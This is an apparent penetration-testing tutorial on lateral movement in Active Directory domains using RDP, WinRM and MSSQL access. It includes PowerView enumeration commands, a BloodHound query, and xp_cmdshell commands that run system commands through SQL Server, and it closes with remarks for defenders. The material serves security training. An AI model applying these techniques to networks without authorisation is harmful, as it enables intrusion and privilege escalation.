When it comes to navigating the labyrinth of Active Directory environments, lateral movement is a critical skill for penetration testers. Once a foothold is established within a domain, the focus shifts to expanding access either through lateral or vertical movement to achieve domain compromise or other strategic objectives. This article explores some of the most effective techniques for lateral movement in Windows domains, leveraging tools like BloodHound, PowerView, and others to enumerate and exploit access rights.

The Art of Lateral Movement: Key Techniques

Lateral movement hinges on identifying and exploiting access pathways within a domain. If you’ve compromised an account with local admin rights on one or more hosts, techniques like Pass-the-Hash via the SMB protocol often come into play. But what if you lack such privileges? Here’s where alternative methods shine:

• Remote Desktop Protocol (RDP): RDP provides GUI-based remote access to target hosts. Even without admin rights, accounts with RDP privileges can serve as valuable stepping stones.
• PowerShell Remoting (WinRM): This protocol allows command execution or interactive sessions on remote hosts using PowerShell.
• MSSQL Server Access: Accounts with sysadmin privileges on SQL Server instances can execute operating system commands via the SQL Server service account.

Each of these methods offers unique opportunities for privilege escalation, credential harvesting, and reconnaissance.

Enumerating Remote Access Privileges

Effective lateral movement begins with enumeration. Tools like BloodHound are indispensable for mapping out access pathways. For instance, BloodHound’s edges such as CanRDP, CanPSRemote, and SQLAdmin reveal which users have remote access rights to specific hosts. Alternatively, PowerView and built-in Windows tools can be used for manual enumeration.

Example: Enumerating RDP Users

Using PowerView’s Get-NetLocalGroupMember function, you can identify members of the Remote Desktop Users group on a target host:

PS C:\htb> Get-NetLocalGroupMember -ComputerName ACADEMY-EA-MS01 -GroupName “Remote Desktop Users”

If all Domain Users are granted RDP access to a host, this could signal a significant security gap. Such hosts often serve as jump servers or Remote Desktop Services (RDS) environments and may contain sensitive data or offer privilege escalation opportunities.

Exploiting Remote Management Protocols

WinRM Access

WinRM is another potent avenue for lateral movement. Accounts with membership in the Remote Management Users group can leverage WinRM without requiring local admin rights. Enumeration can be performed using PowerView:

PS C:\htb> Get-NetLocalGroupMember -ComputerName ACADEMY-EA-MS01 -GroupName “Remote Management Users”

For exploitation, tools like evil-winrm (on Linux) or PowerShell’s Enter-PSSession cmdlet (on Windows) allow you to establish remote sessions and execute commands.

SQL Server Admin Privileges

SQL servers are ubiquitous in enterprise environments and often house accounts with excessive privileges. Credentials obtained through techniques like Kerberoasting or LLMNR/NBT-NS spoofing can be used to authenticate against SQL servers. Tools such as PowerUpSQL or Impacket’s mssqlclient.py enable enumeration and exploitation of SQL instances.

For example, after identifying an account with sysadmin privileges using BloodHound:

MATCH p1=shortestPath((u1:User)-[r1:MemberOf*1..]->(g1:Group)) MATCH p2=(u1)-[:SQLAdmin*1..]->(c:Computer) RETURN p2

You can authenticate and execute commands via SQL Server’s xp_cmdshell feature:

SQL> enable_xp_cmdshell

SQL> xp_cmdshell ‘whoami /priv’

This often leads to SYSTEM-level access if the account has SeImpersonatePrivilege enabled.

Iterative Enumeration and Exploitation

Penetration testing is an iterative process. Each successful compromise should trigger a fresh round of enumeration to uncover new access rights and privileges. For example:

1. Use BloodHound to identify execution rights such as RDP or WinRM.
2. Check for SQLAdmin privileges that could provide SYSTEM-level access.
3. Reassess newly compromised accounts for additional lateral movement opportunities.

Practical Tools for Penetration Testers

Here’s a quick rundown of essential tools:

• BloodHound: Visualises Active Directory relationships and identifies attack paths.
• PowerView: Enumerates domain information from Windows hosts.
• evil-winrm: Simplifies WinRM exploitation from Linux attack hosts.
• PowerUpSQL: Facilitates enumeration and exploitation of MSSQL servers.
• Impacket Toolkit: Offers versatile tools like mssqlclient.py for SQL server attacks.

Conclusion: The Road to Domain Compromise

Lateral movement is not just about exploiting technical vulnerabilities, it’s about understanding how permissions and configurations intersect within an Active Directory environment. By systematically enumerating remote access rights, leveraging tools like BloodHound, and exploiting protocols such as RDP, WinRM, and MSSQL, penetration testers can methodically advance toward their goals.

For defenders (blue teams), these same techniques underscore the importance of regular audits to identify misconfigurations, such as overly permissive RDP or WinRM settings and mitigate risks before attackers exploit them.

In the end, whether you’re a penetration tester probing for weaknesses or a defender shoring up defences, mastering lateral movement techniques is essential for navigating today’s complex enterprise networks.